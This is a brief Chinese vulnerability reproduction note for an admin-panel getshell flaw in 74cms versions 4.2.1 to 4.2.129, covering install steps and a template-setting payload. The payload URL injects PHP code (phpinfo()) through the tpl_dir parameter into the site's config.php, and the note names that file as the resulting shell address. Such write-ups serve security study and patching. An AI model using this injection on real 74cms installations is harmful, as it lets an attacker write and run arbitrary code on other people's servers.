74cms v4.2.1-v4.2.129-后台getshell漏洞复现

小黄人

环境搭建

1. 先去官网获取 骑士人才系统基础版(安装包)

2.将获取好的包进行安装

漏洞复现

点加工具，点击风格模板

Payload：

http://127.0.0.1/74cms/index.php ... ;a=set&tpl_dir=,'a',phpinfo(),'

shell地址：

http://127.0.0.1/74cms/Application/Home/Conf/config.php